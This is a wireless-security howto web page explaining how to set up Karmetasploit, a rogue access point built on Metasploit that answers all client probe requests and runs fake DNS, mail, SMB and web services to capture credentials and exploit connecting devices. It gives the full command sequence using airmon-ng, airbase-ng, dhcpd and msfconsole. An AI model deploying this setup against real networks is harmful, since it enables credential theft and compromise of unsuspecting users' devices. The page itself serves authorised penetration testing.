Linux

 

Linux tools, Howtos

 

Tools Index

 

Wireless Commands

 

FC6 Build Howto

 

FC5 Build Howto

 

FC4 Build Howto

 

Live Linux Distros

 

 

Site Search

 

 

 

 

Windows

 

WIN32 tools, Howtos

 

Tools Index

 

 

Get Firefox!

 

 

General

 

Miscellaneous WI-FI

 

Default WI-FI Settings

 

Rogue AP Howtos

 

WI-FI Certifications

 

802.11 Standards

 

STEP BY STEP Guides

 

Formats / Extensions

 

WI-FI Home Security

 

Useful Links

 

 

 

 

 

Karmetasploit

 

Project Homepage: http://www.metasploit.com/dev/trac/wiki/Karmetasploit

 

Karmetasploit is a new implementation of Dino Dai Zovi's original and excellent tool KARMA

 

"KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host." -http://theta44.org

 

The main differences between Karma and Karmetasploit it that is Karmetasploit does not have the limitation of only working on hardware configured with the patched Mad-wifi drivers, and it also comes with the powerful exploit framework that is metasploit.

 

 

Prerequisites:

 

You need to have the aircrack-ng suite installed, see http://www.aircrack-ng.org/doku.php?id=install_aircrack

 

Your card must support and be running patched drivers that support packet injection, see http://www.aircrack-ng.org/doku.php?id=install_drivers

 

To confirm you card does now support injection use aircrack-ng's injection test: http://www.aircrack-ng.org/doku.php?id=injection_test

 

karmetasploit requires a backend database to be in place before it can be used, this can be achieved by running:

 

gem install activerecord sqlite3-ruby

 

 

 

Initial configuration:

 

The first thing we need to configure is a dhcpd server, for our purposes BackTrack 3's built-in dhcpd server and configuration (/etc/dhcpd.conf) will suffice (but any native or 3rd party dhcpd server is equally good) we'll start this later.

 

 

 

Next we should ensure that metasploit is installed and fully up-to-date

 

cd /pentest/exploits/framework3

 

svn update

 

 

Configuring Karmetasploit:

 

First destroy all existing athx (or equivalent) interfaces:

 

wlanconfig destroy ath0  (repeat for other virtual interfaces e.g. ath1 etc)

 

Now create a new monitor mode virtual interface:

 

airmon-ng start wifi0  (This will create a new monitor mode interface ath0, use iwconfig to confirm)

 

Now create the new access point:

 

modprobe tun

 

airbase-ng -P -C 30 --essid "linksys" -v ath0

 

 

-P  = Respond to all probes

- C 30 = enable beaconing of probed ESSID values (in seconds)

--essid = specify a single (initial) ESSID

-v = verbose

ath0 = Our virtual monitor mode interface

 

 

Start-up karmetasploit:

 

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

 

dhcpd -cf /etc/dhcpd.conf at0

 

cd /pentest/exploits/framework3

 

./msfconsole -r  karma.rc

 

 

New Client connection:

 

As you can see below, we now have a client connected to our rogue access point, it was initially probing for the SSIDs Honeypot and linksys:

 

 

 

Karmetasploit black holing HTTP requests:

 

 

 

"Karmetasploit includes a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, a SMTP service, a FTP service, a couple of different SMB services, and most importantly, a web service." -Karmetasploit Homepage


 

  
 
  © Copyright 2010 Wirelessdefence.org. All Rights Reserved.